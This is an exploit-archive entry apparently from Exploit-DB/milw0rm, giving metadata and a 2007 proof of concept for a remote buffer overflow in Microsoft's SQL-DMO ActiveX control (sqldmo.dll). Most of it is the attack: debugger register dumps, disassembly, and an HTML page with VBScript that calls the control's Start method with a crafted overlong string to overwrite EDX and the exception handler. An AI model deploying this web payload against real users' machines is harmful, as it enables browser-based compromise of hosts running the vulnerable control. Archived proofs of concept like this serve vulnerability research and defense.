Microsoft SQL Server Distributed Management Objects OLE DLL Remote Buffer Overflow

vendor:

SQL Server Distributed Management Objects

by:

rgod

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: SQL Server Distributed Management Objects

Affected Version From: 08.05.2004

Affected Version To: 08.05.2004

Patch Exists: NO

Related CWE: Unknown

CPE: microsoft:sql_server_distributed_management_objects

Metasploit:

Other Scripts:

Platforms Tested:

2007

Microsoft SQL Server Distributed Management Objects OLE DLL Remote Buffer Overflow

The exploit involves passing fuzzy characters to the Start method of the SQL Server Distributed Management Objects OLE DLL (sqldmo.dll). By manipulating the EDX register, the first exploitable condition is achieved. Additionally, the Structured Exception Handler (SEH) is overwritten to gain control of the program flow. This vulnerability can be exploited if the ActiveX control is set to 'ask' or 'enabled' for the Internet zone.

Mitigation:

Apply the necessary patches and updates provided by Microsoft. Avoid executing untrusted code or opening untrusted files.

Source

Exploit-DB raw data:

<!--
18.48 01/09/2007
Microsoft SQL Server Distributed Management Objects OLE DLL for
SQL Enterprise Manager (sqldmo.dll) remote buffer overflow poc

file version: 2000.085.2004.00
product version: 8.05.2004

passing some fuzzy chars to Start method:

EAX 00000000
ECX 00620062
EDX 00620062
EBX 1C3A3638 SQLDMO.1C3A3638
ESP 0013D87C
EBP 0013DAA8
ESI 03042544
EDI 0013DAA0 ASCII "|T"
EIP 1C1C9800 SQLDMO.1C1C9800

...
1C1C97EA   8D8D E4FDFFFF    LEA ECX,DWORD PTR SS:[EBP-21C]
1C1C97F0   51               PUSH ECX
1C1C97F1   8B95 E0FDFFFF    MOV EDX,DWORD PTR SS:[EBP-220]
1C1C97F7   8B02             MOV EAX,DWORD PTR DS:[EDX]
1C1C97F9   8B8D E0FDFFFF    MOV ECX,DWORD PTR SS:[EBP-220]
1C1C97FF   51               PUSH ECX
1C1C9800   FF90 DC010000    CALL DWORD PTR DS:[EAX+1DC] <--- exception
access violation when reading 000001DC

by manipulating edx you have the first exploitable condition...


also seh is overwritten, then:

EAX 00000000
ECX 00610061
EDX 7C9137D8 ntdll.7C9137D8
EBX 00000000
ESP 0013D4AC
EBP 0013D4CC
ESI 00000000
EDI 00000000
EIP 00610061

object safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True

means: works according to security settings for the Internet zone
needs Activex "not marked as safe" option set to "ask" or "enabled" (not the predefined one)

rgod.
http://retrogod.altervista.org
-->
<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<script language='vbscript'>

targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype  = "Sub Start ( ByVal StartMode As Boolean ,  [ ByVal Server As Variant ] ,  [ ByVal Login As Variant ] ,  [ ByVal Password As Variant ] )"
memberName = "Start"
progid     = "SQLDMO.SQLServer"
argCount   = 4

'edx = ecx
edx       ="bb"
seh       ="aa"
StartMode =True
Server    ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA@AA\tes\test\test\tes.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\\\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te@st\tes\test\test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRRR\QQQQ\PP@PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCCC\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:#$%\ttttt\ssss\rr@rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\fffff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login     ="aaaaaaaa"
Password  ="bbbbbbbb"

SQLServer.Start StartMode ,Server ,Login ,Password

</script>
</html>

# milw0rm.com [2007-09-08]